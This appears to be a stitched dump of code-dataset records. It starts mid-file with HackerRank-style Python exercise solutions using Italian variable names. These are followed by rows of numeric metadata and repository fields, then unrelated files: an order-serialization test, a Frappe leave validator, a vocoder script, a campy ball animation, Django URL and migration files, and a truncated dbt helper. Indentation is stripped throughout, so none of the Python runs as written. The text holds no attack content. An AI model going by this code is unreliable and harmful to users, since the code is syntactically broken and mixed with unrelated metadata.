print("".join(riga))
for i in range(0,size):
riga=['-']*(4*size-3)
for j in range(0,size-i):
riga[2*(size-1+j)] = lettere[i+j]
riga[2*(size-1-j)] = lettere[i+j]
print("".join(riga))
if __name__ == '__main__':
n = int(input())
print_rangoli(n)
#Capitalize!
import math
import os
import random
import re
import sys
def solve(s):
n=s.split(' ')
for i in range(0,len(n)):
n[i]=n[i].capitalize()
s_up=' '.join(n)
return s_up
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = raw_input()
result = solve(s)
fptr.write(result + '\n')
fptr.close()
#The Minion Game
def minion_game(string):
s=0
k=0
vocali='AEIOU'
for i in range(len(string)):
if string[i] in vocali:
k+=len(string)-i#oppure len(string[i:])
else:
s+=len(string)-i
if s>k:
print('Stuart',s)
elif s<k:
print('Kevin',k)
else:
print('Draw')
if __name__ == '__main__':
s = input()
minion_game(s)
#Merge the Tools!
def merge_the_tools(string, k):
t=[]
for i in range (0,len(string),k):
t.append(string[i:i+k])
for i in t:
u=''
for j in i:
if j not in u:
u+=j
print (u)
if __name__ == '__main__':
string, k = input(), int(input())
merge_the_tools(string, k)
#collections.Counter()
from collections import Counter
n=int(input())
l=list(map(int,input().split()))
nclient=int(input())
p=0
c=Counter(l)
for _ in range (nclient):
client=list(map(int,input().split()))
if client[0] in c and c[client[0]]>0:
p+=client[1]
c[client[0]]-=1
print(p)
#Introduction to Sets
def average(array):
s=set(array)
m=sum(s)/len(s)
return m
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().split()))
result = average(arr)
print(result)
#DefaultDict Tutorial
from collections import defaultdict
A=defaultdict(list)
n,m=map(int,input().split())
for i in range (n):
A[input()].append(i+1)
for i in range(m):
e=input()
if e in A:
print(' '.join(map(str,A[e])))
else :
print (-1)
#Calendar Module
import calendar
a=input().split(' ')
giorno=calendar.weekday(int(a[2]),int(a[0]),int(a[1]))
g=calendar.day_name[giorno]
print(g.upper())
#Exceptions
n=int(input())
for i in range(n):
try:
a,b=map(int,input().split())
print (a//b)
except ZeroDivisionError as e:
print('Error Code:',e)
except ValueError as v:
print('Error Code:',v)
#Collections.namedtuple()
from collections import namedtuple
n=int(input())
somma=0
l=input().split()
stud=namedtuple('stud',l)
for _ in range (n):
l1,l2,l3,l4=input().split()
s=stud(l1,l2,l3,l4)
somma+=int(s.MARKS)
print(somma/n)
#Time Delta
import math
import os
import random
import re
import sys
from datetime import datetime
def time_delta(t1, t2):
g1=datetime.strptime(t1,'%a %d %b %Y %H:%M:%S %z')
g2=datetime.strptime(t2,'%a %d %b %Y %H:%M:%S %z')
differenza=int(abs((g1-g2).total_seconds()))
return str(differenza)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
t1 = input()
t2 = input()
delta = time_delta(t1, t2)
fptr.write(delta + '\n')
fptr.close()
#No Idea!
n,m=map(int,input().split())
arr=list(map(int,input().split()))
A=set(map(int,input().split()))
B=set(map(int,input().split()))
happiness=0
for i in arr:
if i in A:
happiness+=1
if i in B:
happiness-=1
print(happiness)
#Collections.OrderedDict()
from collections import OrderedDict
n=int(input())
d=OrderedDict()
for _ in range (n):
i=input().split()
if len(i)==2:
if i[0] not in d:
d[i[0]]=int(i[1])
else:
d[i[0]]+=int(i[1])
else:
if i[0]+' '+i[1] not in d:
d[i[0]+' '+i[1]]=int(i[2])
else:
d[i[0]+' '+i[1]]+=int(i[2])
for e in d:
print(e,d[e])
#Symmetric Difference
n1=input()
a=input().split(' ')
n2=input()
b=input().split(' ')
a1=list(map(int,a))
b1=list(map(int,b))
s1=set(a1)
s2=set(b1)
s3=s1.symmetric_difference(s2)
l=list(s3)
l.sort()
for elem in l :
print (elem)
#Set .add()
n=int(input())
s=set()
for i in range(0,n):
s.add(input())
print(len(s))
#Word Order
from collections import OrderedDict
n=int(input())
d=OrderedDict()
for i in range(n):
s=input()
if s not in d:
d[s]=1
else:
d[s]+=1
print (len(d))
for e in d :
print(d[e],end=' ')
#Set .discard(), .remove() & .pop()
n = int(input())
s = set(map(int, input().split()))
comandi=int(input())
for i in range (0,comandi):
a=input().split(' ')
if a[0]=='pop':
s.pop()
if a[0] =='discard':
s.discard(int(a[1]))
if a[0] == 'remove':
s.remove(int(a[1]))
print(sum(s))
#Collections.deque()
from collections import deque
d=deque()
for _ in range(int(input())):
metodo,*valore=input().split()
getattr(d, metodo)(*valore)
for elem in d:
print(elem,end=' ')
#Company Logo
import math
import os
import random
import re
import sys
from collections import Counter
if __name__ == '__main__':
s = sorted(input())
c=Counter(s)
l=c.most_common(3)
for e in l :
print(e[0]+' '+str(e[1]))
#Set .union() Operation
n1=int(input())
s1=set(map(int,input().split(' ')))
n2=int(input())
s2=set(map(int,input().split(' ')))
s3=s1.union(s2)
print(len(s3))
#Set .intersection() Operation
n1=input()
s1=set(input().split(' '))
n2=input()
s2=set(input().split(' '))
print(len(s1.intersection(s2)))
#Set .difference() Operation
n1,s1=input(),set(input().split())
n2,s2=input(),set(input().split())
print(len(s1.difference(s2)))
#Set .symmetric_difference() Operation
n1,s1= input(),set(input().split())
n2,s2= input(),set(input().split())
print(len(s1.symmetric_difference(s2)))
#Set Mutations
n,s=input(),set(map(int,input().split()))
for _ in range(int(input())):
l,i=input().split(),set(map(int,input().split()))
if l[0]=='update':
s.update(i)
if l[0]=='intersection_update':
s.intersection_update(i)
if l[0]=='symmetric_difference_update':
s.symmetric_difference_update(i)
if l[0]=='difference_update':
s.difference_update(i)
print(sum(s))
#The Captain's Room
n=int(input())
l=input().split()
s1=set()
s2=set()
for i in l:
if i not in s1:
s1.add(i)
else:
s2.add(i)
s1.difference_update(s2)
print(list(s1)[0])
#Check Subset
for _ in range(n):
a,s1=input(),set(map(int,input().split()))
b,s2=input(),set(map(int,input().split()))
if s1.intersection(s2)==s1:
print('True')
else:
print('False')
#Check Strict Superset
s=set(map(int,input().split()))
n=int(input())
sup=True
for _ in range(n):
s1=set(map(int,input().split()))
for e in s1:
if e not in s:
sup=False
exit
if s==s1:
sup=False
exit
print(sup)
#Zipped!
n,x=map(int,input().split())
l=[]
for i in range (x):
l.append(list(map(float,input().split())))
for i in (zip(*l)):
media=sum(i)/len(i)
print (media)
#Athlete Sort
import math
import os
import random
import re
import sys
if __name__ == '__main__':
nm = input().split()
n = int(nm[0])
m = int(nm[1])
arr = []
for _ in range(n):
arr.append(list(map(int, input().rstrip().split())))
k = int(input())
colonna=[]
for i in range(n):
colonna.append(arr[i][k])
colonna.sort()
for i in range(n):
for j in range(n):
if colonna[i]==arr[j][k]:
print(*arr[j])
arr.remove(arr[j])
break
#ginortS
s=input()
p=[]
d=[]
m=[]
M=[]
for i in range(len(s)):
if s[i].isupper():
M.append(s[i])
elif s[i].islower():
m.append(s[i])
elif int(s[i])%2==0:
p.append(s[i])
else:
d.append(s[i])
M.sort()
m.sort()
p.sort()
d.sort()
print(''.join(m+M+d+p))
#Detect Floating Point Number
import re
n=int(input())
for i in range (n):
numero=input()
if re.match(r"^[-+]?[0-9]*\.[0-9]+$",numero):
print(True)
else :
print(False)
#Map and Lambda Function
cube = lambda x :x**3
def fibonacci(n):
l=[0,1]
if n<2:
return l[:n]
for _ in range(n-2):
l.append(l[-1]+l[-2])
return l
if __name__ == '__main__':
n = int(input())
print(list(map(cube, fibonacci(n))))
#Re.split()
regex_pattern = r"[,.]"
import re
print("\n".join(re.split(regex_pattern, input())))
#Validating phone numbers
import re
n=int(input())
for i in range(n):
if re.match(r'[789]\d{9}$',input()):
print('YES')
else:
print('NO')
#Validating and Parsing Email Addresses
import re
import email.utils
n=int(input())
for i in range(n):
e=email.utils.parseaddr(input())
if re.match(r'[a-z][-a-z._0-9]+@[a-z]+\.[a-z]{1,3}$',e[1]):
print(email.utils.formataddr(e))
#Hex Color Code
import re
n=int(input())
for _ in range(n):
color=re.findall(r':?.(#[0-9a-fA-F]{6}|#[0-9a-fA-F]{3})',input())
for c in color:
print(c)
#XML 1 - Find the Score
import sys
import xml.etree.ElementTree as etree
def get_attr_number(node):
s=0
for child in node.iter():
s+=len(child.attrib)
return s
if __name__ == '__main__':
sys.stdin.readline()
xml = sys.stdin.read()
tree = etree.ElementTree(etree.fromstring(xml))
root = tree.getroot()
print(get_attr_number(root))
#Validating UID
import re
for i in range(int(input())):
carta=input()
if re.match(r'^(?!.*(.).*\1)(?=(?:.*[A-Z]){2,})(?=(?:.*\d){3,})[a-zA-Z0-9]{10}$',carta):
print('Valid')
else:
print('Invalid')
#XML2 - Find the Maximum Depth
import xml.etree.ElementTree as etree
maxdepth = 0
def depth(elem, level):#bisogna usare la ricorsione perchè per ogni figlio bidogna vedere quanti figli ha a sua volta ,ogni volta aumentare il livello di 1
global maxdepth#è una variabile globale quindi non la dobbiamo 'ritornare'
level+=1
if level >= maxdepth:
maxdepth = level
for child in elem:
depth(child, level)
if __name__ == '__main__':
n = int(input())
xml = ""
for i in range(n):
xml = xml + input() + "\n"
tree = etree.ElementTree(etree.fromstring(xml))
depth(tree.getroot(), -1)
print(maxdepth)
#Arrays
import numpy
def arrays(arr):
a=numpy.array(arr,float)
return numpy.flip(a)
arr = input().strip().split(' ')
result = arrays(arr)
print(result)
#Shape and Reshape
import numpy
#l=list(map(int,input().split()))
#a=numpy.array(l)
#print (numpy.reshape(a,(3,3)))
l=input().split()
a=numpy.array(l,int)
print (numpy.reshape(a,(3,3)))
#Transpose and Flatten
import numpy
n,m=map(int,input().split())
l=[]
for i in range(n):
l.append(input().split())
a=numpy.array(l,int)
print (numpy.transpose(a))
print (a.flatten())
#Concatenate
import numpy
n,m,p=map(int,input().split())
l1=[]
l2=[]
for i in range(n):
l1.append(input().split())
for i in range (m):
l2.append(input().split())
a=numpy.array(l1,int)
b=numpy.array(l2,int)
print(numpy.concatenate((a,b),axis=0))
#Zeros and Ones
import numpy
a,b,*c=map(int,input().split())
print (numpy.zeros((a,b,*c),dtype=numpy.int))
print (numpy.ones((a,b,*c),dtype=numpy.int))
#Eye and Identity
import numpy
r,c=map(int,input().split())
numpy.set_printoptions(sign=' ')
print (numpy.eye(r,c,k=0))
#Array Mathematics
import numpy
n,m=map(int,input().split())
l1=[]
l2=[]
for _ in range(n):
l1.append(input().split())
for _ in range(n):
l2.append(input().split())
a=numpy.array(l1,int)
b=numpy.array(l2,int)
print(a+b)
print(a-b)
print(a*b)
print(a//b)
print(a%b)
print(a**b)
#Floor, Ceil and Rint
import numpy
a=numpy.array(input().split(),float)
numpy.set_printoptions(sign=' ')
print(numpy.floor(a))
print(numpy.ceil(a))
print(numpy.rint(a))
#Sum and Prod
import numpy
n,m=map(int,input().split())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,int)
s= numpy.sum(a,axis=0)
print (numpy.prod(s))
#Min and Max
import numpy
n,m=map(int,input().split())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,int)
m=numpy.min(a,axis=1)
print(numpy.max(m))
#Mean, Var, and Std
import numpy
n,m=map(int,input().split())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,int)
numpy.set_printoptions(legacy='1.13')
print(numpy.mean(a,axis=1))
print(numpy.var(a,0))
print(numpy.std(a))
#Dot and Cross
import numpy
n=int(input())
l1=[]
l2=[]
for _ in range(n):
l1.append(input().split())
a=numpy.array(l1,int)
for _ in range(n):
l2.append(input().split())
b=numpy.array(l2,int)
print(numpy.dot(a,b))
#Inner and Outer
import numpy
a=numpy.array(input().split(),int)
b=numpy.array(input().split(),int)
print(numpy.inner(a,b))
print(numpy.outer(a,b))
#Polynomials
import numpy
a=numpy.array(input().split(),float)
val=int(input())
print(numpy.polyval(a,val))
#Linear Algebra
import numpy
n=int(input())
l=[]
for _ in range(n):
l.append(input().split())
a=numpy.array(l,float)
print(round(numpy.linalg.det(a),2))
#Exercises of the Problem 2 (6/6)
#Birthday Cake Candles
import math
import os
import random
import re
import sys
def birthdayCakeCandles(candles):
m=max(candles)
return candles.count(m)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
result = birthdayCakeCandles(candles)
fptr.write(str(result) + '\n')
fptr.close()
#Number Line Jumps
import math
import os
import random
import re
import sys
def kangaroo(x1, v1, x2, v2):
if x2>x1 and v2>=v1:
risp='NO'
return risp
if x1>x2 and v1>=v2:
risp='NO'
return risp
if (x2-x1)%(v1-v2)==0:
risp ='YES'
return risp
else :
risp='NO'
return risp
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
x1V1X2V2 = input().split()
x1 = int(x1V1X2V2[0])
v1 = int(x1V1X2V2[1])
x2 = int(x1V1X2V2[2])
v2 = int(x1V1X2V2[3])
result = kangaroo(x1, v1, x2, v2)
fptr.write(result + '\n')
fptr.close()
#Viral Advertising
import math
import os
import random
import re
import sys
def viralAdvertising(n):
l=[2]
for i in range(n-1):
l.append(math.floor(l[-1]*3/2))
return (sum(l))
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
result = viralAdvertising(n)
fptr.write(str(result) + '\n')
fptr.close()
#Recursive Digit Sum
import math
import os
import random
import re
import sys
def superDigit(n, k):
if len(n)==1:
return int(n)
l=list(map(int,n))
p=sum(l)*k
return superDigit(str(p),1)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nk = input().split()
n = nk[0]
k = int(nk[1])
result = superDigit(n, k)
fptr.write(str(result) + '\n')
fptr.close()
#Insertion Sort - Part 1
import math
import os
import random
import re
import sys
def insertionSort1(n, arr):
num=arr[-1]
for i in range(2,n+1):
if arr[n-i]>num:
arr[n-i+1]=arr[n-i]
print(*arr)
else:
arr[n-i+1]=num
print(*arr)
break
if arr[0]>num:
arr[1]=arr[0]
arr[0]=num
print(*arr)
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().rstrip().split()))
insertionSort1(n, arr)
#Insertion Sort - Part 2
import math
import os
import random
import re
import sys
def insertionSort2(n, arr):
for i in range (1,n):
for j in range(0,i):
if arr[i]<arr[j]:
arr.remove(arr[i])
arr.insert(j,arr[i])
print(*arr)
print(*arr)
if __name__ == '__main__':
n = int(input())
arr = list(map(int, input().rstrip().split()))
insertionSort2(n, arr)
| 19.026799 | 156 | 0.540706 | 3,734 | 24,849 | 3.479914 | 0.115426 | 0.044328 | 0.024473 | 0.036401 | 0.434046 | 0.357857 | 0.280437 | 0.243112 | 0.211867 | 0.204941 | 0 | 0.022463 | 0.283392 | 24,849 | 1,305 | 157 | 19.041379 | 0.70725 | 0.070989 | 0 | 0.475392 | 0 | 0.003356 | 0.047821 | 0.009776 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.102908 | null | null | 0.1566 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f17d842da515de7fc906d22c723ce681702761 | 2,046 | py | Python | oms/test/test_order.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 5 | 2021-08-10T23:16:44.000Z | 2022-03-17T17:27:00.000Z | oms/test/test_order.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 330 | 2021-06-10T17:28:22.000Z | 2022-03-31T00:55:48.000Z | oms/test/test_order.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 6 | 2021-06-10T17:20:32.000Z | 2022-03-28T08:08:03.000Z | import logging
import helpers.hunit_test as hunitest
import oms.order as omorder
import oms.order_example as oordexam
_LOG = logging.getLogger(__name__)
class TestOrder1(hunitest.TestCase):
def test1(self) -> None:
"""
Test building and serializing an Order.
"""
order = oordexam.get_order_example1()
# Check.
act = str(order)
exp = r"""Order: order_id=0
creation_timestamp=2000-01-01 09:30:00-05:00
asset_id=101
type_=price@twap
start_timestamp=2000-01-01 09:35:00-05:00
end_timestamp=2000-01-01 09:40:00-05:00
curr_num_shares=0.0
diff_num_shares=100.0
tz=America/New_York"""
exp = exp.replace("\n", " ")
self.assert_equal(act, exp, fuzzy_match=True)
# Deserialize from string.
order2 = omorder.Order.from_string(act)
# Check.
act = str(order2)
self.assert_equal(act, exp, fuzzy_match=True)
class TestOrders1(hunitest.TestCase):
def test1(self) -> None:
"""
Test building and serializing a list of Orders.
"""
orders = [oordexam.get_order_example1(), oordexam.get_order_example1()]
act = omorder.orders_to_string(orders)
exp = r"""
Order: order_id=0 creation_timestamp=2000-01-01 09:30:00-05:00 asset_id=101 type_=price@twap start_timestamp=2000-01-01 09:35:00-05:00 end_timestamp=2000-01-01 09:40:00-05:00 curr_num_shares=0.0 diff_num_shares=100.0 tz=America/New_York
Order: order_id=0 creation_timestamp=2000-01-01 09:30:00-05:00 asset_id=101 type_=price@twap start_timestamp=2000-01-01 09:35:00-05:00 end_timestamp=2000-01-01 09:40:00-05:00 curr_num_shares=0.0 diff_num_shares=100.0 tz=America/New_York
"""
# exp = exp.replace("\n", " ")
self.assert_equal(act, exp, fuzzy_match=True)
# Deserialize from string.
orders2 = omorder.orders_from_string(act)
# Check.
act = omorder.orders_to_string(orders2)
self.assert_equal(act, exp, fuzzy_match=True)
| 37.888889 | 236 | 0.663245 | 312 | 2,046 | 4.153846 | 0.253205 | 0.090278 | 0.104167 | 0.118056 | 0.743827 | 0.676698 | 0.676698 | 0.676698 | 0.622685 | 0.622685 | 0 | 0.127034 | 0.218964 | 2,046 | 53 | 237 | 38.603774 | 0.68398 | 0.091887 | 0 | 0.228571 | 0 | 0.057143 | 0.430786 | 0.166113 | 0 | 0 | 0 | 0 | 0.114286 | 1 | 0.057143 | false | 0 | 0.114286 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f180b857dbd23c3f25d5d18d9b868a2c717d34 | 1,147 | py | Python | mindhome_alpha/erpnext/hr/doctype/leave_type/leave_type.py | Mindhome/field_service | 3aea428815147903eb9af1d0c1b4b9fc7faed057 | [
"MIT"
] | 1 | 2021-04-29T14:55:29.000Z | 2021-04-29T14:55:29.000Z | mindhome_alpha/erpnext/hr/doctype/leave_type/leave_type.py | Mindhome/field_service | 3aea428815147903eb9af1d0c1b4b9fc7faed057 | [
"MIT"
] | null | null | null | mindhome_alpha/erpnext/hr/doctype/leave_type/leave_type.py | Mindhome/field_service | 3aea428815147903eb9af1d0c1b4b9fc7faed057 | [
"MIT"
] | 1 | 2021-04-29T14:39:01.000Z | 2021-04-29T14:39:01.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import calendar
import frappe
from datetime import datetime
from frappe.utils import today
from frappe import _
from frappe.model.document import Document
class LeaveType(Document):
def validate(self):
if self.is_lwp:
leave_allocation = frappe.get_all("Leave Allocation", filters={
'leave_type': self.name,
'from_date': ("<=", today()),
'to_date': (">=", today())
}, fields=['name'])
leave_allocation = [l['name'] for l in leave_allocation]
if leave_allocation:
frappe.throw(_('Leave application is linked with leave allocations {0}. Leave application cannot be set as leave without pay').format(", ".join(leave_allocation))) #nosec
if self.is_lwp and self.is_ppl:
frappe.throw(_("Leave Type can be either without pay or partial pay"))
if self.is_ppl and (self.fraction_of_daily_salary_per_leave < 0 or self.fraction_of_daily_salary_per_leave > 1):
frappe.throw(_("The fraction of Daily Salary per Leave should be between 0 and 1"))
| 38.233333 | 174 | 0.741935 | 168 | 1,147 | 4.875 | 0.458333 | 0.10989 | 0.029304 | 0.076923 | 0.115995 | 0.115995 | 0.080586 | 0 | 0 | 0 | 0 | 0.010299 | 0.153444 | 1,147 | 29 | 175 | 39.551724 | 0.833162 | 0.110724 | 0 | 0 | 0 | 0 | 0.274606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.318182 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21f37da3a047adbe8267c14542444fce93f2f143 | 628 | py | Python | vocoder.py | tapsoft/autovc | b89183b4f02facbeaee73c2c91ef05615e7985c0 | [
"MIT"
] | 1 | 2021-05-18T19:09:05.000Z | 2021-05-18T19:09:05.000Z | vocoder.py | tapsoft/autovc | b89183b4f02facbeaee73c2c91ef05615e7985c0 | [
"MIT"
] | null | null | null | vocoder.py | tapsoft/autovc | b89183b4f02facbeaee73c2c91ef05615e7985c0 | [
"MIT"
] | null | null | null | import os
import torch
import librosa
import pickle
import soundfile as sf
from synthesis import build_model
from synthesis import wavegen
spect_vc = pickle.load(open('results.pkl', 'rb'))
device = torch.device("cuda")
model = build_model().to(device)
checkpoint = torch.load("checkpoint_step001000000_ema.pth")
model.load_state_dict(checkpoint["state_dict"])
outputDir = './wavs'
for spect in spect_vc:
name = spect[0]
c = spect[1]
print(name)
waveform = wavegen(model, c=c)
#librosa.output.write_wav(name+'.wav', waveform, sr=16000)
sf.write(os.path.join(outputDir, name+'.wav'), waveform, 16000) | 27.304348 | 67 | 0.727707 | 91 | 628 | 4.912088 | 0.505495 | 0.058166 | 0.085011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038889 | 0.140127 | 628 | 23 | 67 | 27.304348 | 0.788889 | 0.090764 | 0 | 0 | 0 | 0 | 0.120841 | 0.056042 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.368421 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21f395f0029b2866265b7a849d224eea97a12f20 | 2,067 | py | Python | my_drawing/bouncing_ball.py | YuanMaSa/stancode-projects | d4b8d07650786bdd25fb00c5bada6914cc18b5f4 | [
"MIT"
] | null | null | null | my_drawing/bouncing_ball.py | YuanMaSa/stancode-projects | d4b8d07650786bdd25fb00c5bada6914cc18b5f4 | [
"MIT"
] | null | null | null | my_drawing/bouncing_ball.py | YuanMaSa/stancode-projects | d4b8d07650786bdd25fb00c5bada6914cc18b5f4 | [
"MIT"
] | null | null | null | """
File: bouncing_ball.py
Name: Jonathan Ma
-------------------------
TODO:
"""
from campy.graphics.gobjects import GOval
from campy.graphics.gwindow import GWindow
from campy.gui.events.timer import pause
from campy.gui.events.mouse import onmouseclicked
VX = 3
DELAY = 10
GRAVITY = 1
SIZE = 20
REDUCE = 0.9
START_X = 30
START_Y = 40
window = GWindow(800, 500, title='bouncing_ball.py')
# ball creation
ball = GOval(SIZE, SIZE, x=START_X, y=START_Y)
ball.filled = True
ball.fill_color = "#000000"
# the number of bouncing
bouncing_count = 0
# check if the ball has been clicked
usr_clicked = False
# the number of clicks
count_clicks = 0
def main():
"""
This program simulates a bouncing ball at (START_X, START_Y)
that has VX as x velocity and 0 as y velocity. Each bounce reduces
y velocity to REDUCE of itself.
"""
window.add(ball)
onmouseclicked(click_event)
def click_event(mouse):
"""
:param mouse:
:return: None
"""
global usr_clicked
global bouncing_count
global count_clicks
vy = 0
if usr_clicked is False:
count_clicks += 1
while True:
usr_clicked = True
ball.move(VX, vy)
if ball.y + ball.height >= window.height:
# check if the ball hit the ground
print("hit!!!")
vy = (-vy + GRAVITY) * REDUCE
bouncing_count += 1
else:
# ball still not reach to the ground
vy += GRAVITY
if ball.x + ball.width >= window.width:
# check if ball move out of the scene
usr_clicked = False
break
print(f"ball position: {ball.y + ball.height}")
print(f"VY: {str(vy)}")
pause(DELAY)
if count_clicks == 3:
usr_clicked = True
window.remove(ball)
window.add(ball, START_X, START_Y)
if __name__ == "__main__":
main()
| 23.488636 | 71 | 0.562651 | 265 | 2,067 | 4.260377 | 0.384906 | 0.053144 | 0.024801 | 0.031887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022711 | 0.339623 | 2,067 | 87 | 72 | 23.758621 | 0.804396 | 0.221577 | 0 | 0.081633 | 0 | 0 | 0.059345 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.040816 | false | 0 | 0.081633 | 0 | 0.122449 | 0.061224 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f6ac953977adb43d4446f137f14e3d19478056 | 285 | py | Python | dist/urls.py | tfmt/netboot | abd690d463dfd14488b0d295512d61ce5c5bc97d | [
"Apache-2.0"
] | null | null | null | dist/urls.py | tfmt/netboot | abd690d463dfd14488b0d295512d61ce5c5bc97d | [
"Apache-2.0"
] | null | null | null | dist/urls.py | tfmt/netboot | abd690d463dfd14488b0d295512d61ce5c5bc97d | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from dist import views
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^add$', views.AddCategoryView.as_view(), name='add_category'),
url(r'^(?P<cat_id>\d+)/$', views.CategoryView.as_view(), name='category'),
]
| 28.5 | 78 | 0.663158 | 41 | 285 | 4.487805 | 0.560976 | 0.065217 | 0.163043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122807 | 285 | 9 | 79 | 31.666667 | 0.736 | 0 | 0 | 0 | 0 | 0 | 0.175439 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f9319e8b6fa0bf2f0d17cbb3ff738368d5fe28 | 358 | py | Python | advanced/react-django/APITestProject/api/migrations/0002_auto_20210110_0406.py | rocabrera/python-learning | 578b6f6f64a59039956e2ff8eca9eb486127722f | [
"MIT"
] | 3 | 2021-04-16T01:30:05.000Z | 2021-07-22T21:00:45.000Z | advanced/react-django/APITestProject/api/migrations/0002_auto_20210110_0406.py | rocabrera/python-learning | 578b6f6f64a59039956e2ff8eca9eb486127722f | [
"MIT"
] | null | null | null | advanced/react-django/APITestProject/api/migrations/0002_auto_20210110_0406.py | rocabrera/python-learning | 578b6f6f64a59039956e2ff8eca9eb486127722f | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-10 04:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='article',
old_name='descripton',
new_name='description',
),
]
| 18.842105 | 47 | 0.578212 | 37 | 358 | 5.486486 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076613 | 0.307263 | 358 | 18 | 48 | 19.888889 | 0.741935 | 0.125698 | 0 | 0 | 1 | 0 | 0.138264 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21f9b7045b329df6f1fc9828f5e918547ef50c4d | 917 | py | Python | core/dbt/perf_utils.py | dcereijodo/dbt | 204fc25c2168710d2549515ffe4846880b89fdec | [
"Apache-2.0"
] | 1 | 2021-04-08T03:33:33.000Z | 2021-04-08T03:33:33.000Z | core/dbt/perf_utils.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | [
"Apache-2.0"
] | 1 | 2021-04-30T21:33:11.000Z | 2021-04-30T21:33:11.000Z | core/dbt/perf_utils.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | [
"Apache-2.0"
] | 1 | 2021-06-04T16:00:44.000Z | 2021-06-04T16:00:44.000Z | """A collection of performance-enhancing functions that have to know just a
little bit too much to go anywhere else.
"""
from dbt.adapters.factory import get_adapter
from dbt.parser.manifest import load_manifest
from dbt.contracts.graph.manifest import Manifest
from dbt.config import RuntimeConfig
def get_full_manifest(config: RuntimeConfig) -> Manifest:
"""Load the full manifest, using the adapter's internal manifest if it
exists to skip parsing internal (dbt + plugins) macros a second time.
Also, make sure that we force-laod the adapter's manifest, so it gets
attached to the adapter for any methods that need it.
"""
adapter = get_adapter(config) # type: ignore
